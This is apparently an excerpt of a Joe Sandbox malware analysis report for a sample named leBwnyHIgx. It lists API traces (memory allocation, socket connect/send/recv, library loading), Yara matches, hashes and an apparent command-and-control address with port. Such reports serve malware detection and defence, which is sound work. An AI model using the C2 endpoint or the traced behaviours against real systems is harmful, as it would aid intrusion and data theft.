• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
• String ID:
• API String ID: 2185338108-0
APIs
• __floor_pentium4.LIBCMT ref: 027111E9
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02711226
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02711255
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• __floor_pentium4.LIBCMT ref: 030711E9
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03071226
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03071255
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• __floor_pentium4.LIBCMT ref: 0271112F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0271115F
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02711192
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• __floor_pentium4.LIBCMT ref: 0307112F
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0307115F
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03071192
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree__floor_pentium4
• String ID:
• API String ID: 2605973128-0
APIs
• ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
• ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
  • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
• SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
• String ID:
• API String ID: 1581416325-0
APIs
• GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03079E04
• GdipDisposeImage.GDIPLUS(?), ref: 03079E18
• GdipDisposeImage.GDIPLUS(?), ref: 03079E3B
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Gdip$DisposeImage$BitmapCreateFromStream
• String ID:
• API String ID: 800915452-0
APIs
• EnterCriticalSection.KERNEL32(0309FB64), ref: 03079ADC
• GdiplusStartup.GDIPLUS(0309FB60,?,?), ref: 03079B15
• LeaveCriticalSection.KERNEL32(0309FB64), ref: 03079B26
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterGdiplusLeaveStartup
• String ID:
• API String ID: 389129658-0
APIs
• socket.WS2_32(?,?,?), ref: 10015552
• WSACleanup.WS2_32 ref: 10015566
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
• connect.WS2_32(00000280,?,?), ref: 10015594
• closesocket.WS2_32(00000280), ref: 100155A9
• freeaddrinfo.WS2_32(00000000), ref: 100155C9
• WSACleanup.WS2_32 ref: 100155D9
• exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 100155E1
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: Cleanupexit$closesocketconnectfreeaddrinfosocket
• String ID:
• API String ID: 2176086335-0
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: Sleep
• String ID: 15091$154.82.85.107
• API String ID: 3472027048-3399520398

APIs
• __getptd_noexit.LIBCMT ref: 0271715B
  • Part of subcall function 02719896: GetLastError.KERNEL32(00000001,00000000,02717112,02716F0C,00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F), ref: 0271989A
  • Part of subcall function 02719896: ___set_flsgetvalue.LIBCMT ref: 027198A8
  • Part of subcall function 02719896: __calloc_crt.LIBCMT ref: 027198BC
  • Part of subcall function 02719896: DecodePointer.KERNEL32(00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA), ref: 027198D6
  • Part of subcall function 02719896: GetCurrentThreadId.KERNEL32 ref: 027198EC
  • Part of subcall function 02719896: SetLastError.KERNEL32(00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA), ref: 02719904
• __freeptd.LIBCMT ref: 02717165
  • Part of subcall function 02719A58: TlsGetValue.KERNEL32(?,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719A79
  • Part of subcall function 02719A58: TlsGetValue.KERNEL32(?,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719A8B
  • Part of subcall function 02719A58: DecodePointer.KERNEL32(00000000,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719AA1
  • Part of subcall function 02719A58: __freefls@4.LIBCMT ref: 02719AAC
  • Part of subcall function 02719A58: TlsSetValue.KERNEL32(00000023,00000000,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719ABE
• ExitThread.KERNEL32 ref: 0271716E
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
• String ID:
• API String ID: 4224061863-0
• Opcode ID: 8fa20365b7c87c205c9bbe7198933d8bba65baaf6696e7d700041c504c0b2c6f
• Instruction ID: 6e000c26b2903532d1844b99d14c3dd0d22067441194a936990437313b84af0d
• Opcode Fuzzy Hash: 8fa20365b7c87c205c9bbe7198933d8bba65baaf6696e7d700041c504c0b2c6f
• Instruction Fuzzy Hash: F6C02B3040020CFBDB25373ECC1D80F3A5F9DC0304B918410FA08C1040DF70E802C955

APIs
• __getptd_noexit.LIBCMT ref: 0307F969
  • Part of subcall function 03083DE2: GetLastError.KERNEL32(00000001,00000000,0307F920,0307F6FC,00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76), ref: 03083DE6
  • Part of subcall function 03083DE2: ___set_flsgetvalue.LIBCMT ref: 03083DF4
  • Part of subcall function 03083DE2: __calloc_crt.LIBCMT ref: 03083E08
  • Part of subcall function 03083DE2: DecodePointer.KERNEL32(00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06), ref: 03083E22
  • Part of subcall function 03083DE2: GetCurrentThreadId.KERNEL32 ref: 03083E38
  • Part of subcall function 03083DE2: SetLastError.KERNEL32(00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06), ref: 03083E50
• __freeptd.LIBCMT ref: 0307F973
  • Part of subcall function 03083FA6: TlsGetValue.KERNEL32(?,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 03083FC7
  • Part of subcall function 03083FA6: TlsGetValue.KERNEL32(?,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 03083FD9
  • Part of subcall function 03083FA6: DecodePointer.KERNEL32(00000000,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 03083FEF
  • Part of subcall function 03083FA6: __freefls@4.LIBCMT ref: 03083FFA
  • Part of subcall function 03083FA6: TlsSetValue.KERNEL32(00000025,00000000,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 0308400C
• ExitThread.KERNEL32 ref: 0307F97C
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
• String ID:
• API String ID: 4224061863-0
• Opcode ID: 37ae46181baaa6eda29f61a861ad175eeb05afab63d09c712ab0df92630580f9
• Instruction ID: 0b1fb6e4073cd461dc99505a4e864e1d37ab8b17ef45cf62c954fe24f99af642
• Opcode Fuzzy Hash: 37ae46181baaa6eda29f61a861ad175eeb05afab63d09c712ab0df92630580f9
• Instruction Fuzzy Hash: 98C08C2C0063097B8B107731980894A3A5C9EC06007140010A8088D040DE28DC0080A0

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02EF022B
Memory Dump Source
• Source File: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2ef0000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
• Instruction ID: 74d6010ac56dde56779d5fd572020cc6df36c91747142b8755be1f7aa9d0117d
• Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
• Instruction Fuzzy Hash: 5DA17F70A41606EFDB54CFA9C880AAEB7F1FF48308F149069E615DB356E730EA50CB90

APIs
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: Time_memmovetime
• String ID:
• API String ID: 1463837790-0
• Opcode ID: 2e8c464e0f98c50793b062f82301dc62c12c4261c57b9249cbad5cfdecff57ea
• Instruction ID: 110caf925e6e30bd548f69e28f09606f34a4d7dd2093c37ce890bcb5599a424d
• Opcode Fuzzy Hash: 2e8c464e0f98c50793b062f82301dc62c12c4261c57b9249cbad5cfdecff57ea
• Instruction Fuzzy Hash: D5519A727002019FD726CF6DC8C5A7AB7AABF8831471486ADED1A9B704DB31F851CB90

APIs
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Time_memmovetime
• String ID:
• API String ID: 1463837790-0
• Opcode ID: 8b7c67a28dc406bdc9c6371948cb2fd1d4fc011a53ff9f0a0610e3ee878f1546
• Instruction ID: 83042353fe8bfde18464f5564cc3f847452aefef57cf83ae3dc5b5ec9f3a61ed
• Opcode Fuzzy Hash: 8b7c67a28dc406bdc9c6371948cb2fd1d4fc011a53ff9f0a0610e3ee878f1546
• Instruction Fuzzy Hash: 8E51D77AB012019FE729CF69C8C096AF7A9FF8421071885ACE919CBB04D731F851C7D8

APIs
• GetUserDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB33
• GetSystemDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB5B
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: DefaultLanguage$SystemUser
• String ID:
• API String ID: 384301227-0
• Opcode ID: 20e8ba98e2816f8af13bed9515c1d960020764da17156fa36e2f3308999935a6
• Instruction ID: 44e41ead65ef66f727125de80912159cd7281fcfb7f7393cce7e535fa76c4ae3
• Opcode Fuzzy Hash: 20e8ba98e2816f8af13bed9515c1d960020764da17156fa36e2f3308999935a6
• Instruction Fuzzy Hash: D4312E70A10209DBDB10EB99D8C2AAEB7B5EB44304F50467BE400B72D5DB78AD45CB99

APIs
• select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02713023
• recv.WS2_32(?,?,00040000,00000000), ref: 02713044
  • Part of subcall function 0271710D: __getptd_noexit.LIBCMT ref: 0271710D
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: __getptd_noexitrecvselect
• String ID:
• API String ID: 4248608111-0
• Opcode ID: d15647cb759708b97f700eb667779d0a682ce3cbfa27f8111b5caba48d97cfe4
• Instruction ID: aa16727692bf80cf6cd3b02c9b8f795453bb5835377798b823588c75ac20d64d
• Opcode Fuzzy Hash: d15647cb759708b97f700eb667779d0a682ce3cbfa27f8111b5caba48d97cfe4
• Instruction Fuzzy Hash: 1021D3B0E00208DBDB25DF2CDC88B9A77B6EF44725F1001E4E515AB190DBB0AD84CFA1

APIs
• select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03073043
• recv.WS2_32(?,?,00040000,00000000), ref: 03073064
  • Part of subcall function 0307F91B: __getptd_noexit.LIBCMT ref: 0307F91B
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: __getptd_noexitrecvselect
• String ID:
• API String ID: 4248608111-0
• Opcode ID: dfde4c9adb0f997db322e9fa07fcdd159c17fc03b3bd51b30bc5f7244f5a73f1
• Instruction ID: 3720c996353063e6240282ad354b2a0e5cd05efce2d3d1f3f303266247c0e2b6
• Opcode Fuzzy Hash: dfde4c9adb0f997db322e9fa07fcdd159c17fc03b3bd51b30bc5f7244f5a73f1
• Instruction Fuzzy Hash: 4721B479D02308ABEB30EF69DC94BDA77A4EF44310F1845E5E5045F190D770A984CBE9

APIs
• send.WS2_32(?,?,00040000,00000000), ref: 03073291
• send.WS2_32(?,?,?,00000000), ref: 030732CE
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: e63ca6b0c43f1bd22bd9c7459bac59aec1ee0db9e8dc870929731db2fbede22b
• Instruction ID: 1e256672028033f50410ba4a0a6071e33ecd694d26bc58bcab535da82cf9ec6d
• Opcode Fuzzy Hash: e63ca6b0c43f1bd22bd9c7459bac59aec1ee0db9e8dc870929731db2fbede22b
• Instruction Fuzzy Hash: B511E57AF07304B7E760CA6ADC89B9EB7DDFB81264F1440A5E908D7280D2719942A698

APIs
• ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: Fiopen@std@@U_iobuf@@
• String ID:
• API String ID: 2284775142-0
• Opcode ID: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
• Instruction ID: 655dba523039e8c1ca7b53558f86e7561812b5aaf6b8d3e237c0567069c37aa1
• Opcode Fuzzy Hash: 4f9c097bd9ff1fc27bc4b621ca56d4494d79341367a5276cc761d7329a66d7a3
• Instruction Fuzzy Hash: 08213AB5D04209EFCB04DF98CC81BAEB7B4FB48750F108628E526A7390D735AA50CBA0

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
• LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    • Opcode ID: 4383079db15fcd8ef662a46fade05db089f3147d55ebe15ae5cef73a62b66191
                                                                                    • Instruction ID: c1507673094f8c5292584a269d2518184869565b67f53896f9c973a0a4d881f3
                                                                                    • Opcode Fuzzy Hash: 4383079db15fcd8ef662a46fade05db089f3147d55ebe15ae5cef73a62b66191
                                                                                    • Instruction Fuzzy Hash: 8411BF70A4420CABEB10EF60CD86BDD73B8DB04704F5041BAB408B32C1DA385F80CA99
APIs
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: SleepTimetime
• String ID:
• API String ID: 346578373-0
• Opcode ID: 17644261f8f2ea678b36258984e6219596e11905b4bf9f7dca3c67d7ff61212b
• Instruction ID: 07eccf90e14672777b8acf3800388b76fc21d853fab8b9c5368cdf2245c0fa63
• Opcode Fuzzy Hash: 17644261f8f2ea678b36258984e6219596e11905b4bf9f7dca3c67d7ff61212b
• Instruction Fuzzy Hash: 8F01D431600609EFD724CF29D8C8BADB7B5FF59305F244264E5009B280C771A9D5C7D1
APIs
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: SleepTimetime
• String ID:
• API String ID: 346578373-0
• Opcode ID: 0346912d0a2d34d6aa8db5adb3c99e162bda0c620433e117039941e44d96bf2c
• Instruction ID: 6bfe12b804034c11092360436fd5248905540e1c3fe40756469286f918ad3853
• Opcode Fuzzy Hash: 0346912d0a2d34d6aa8db5adb3c99e162bda0c620433e117039941e44d96bf2c
• Instruction Fuzzy Hash: DD01DF39A0120ABFE315DF28C8C8BA9F7A9FB99301F1842A5D1048B680C735A9D6D7D5
APIs
• HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,02715AF2), ref: 0271642B
• _free.LIBCMT ref: 02716466
  • Part of subcall function 02711280: __CxxThrowException@8.LIBCMT ref: 02711290
  • Part of subcall function 02711280: DeleteCriticalSection.KERNEL32(00000000,?,02727E78), ref: 027112A1
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
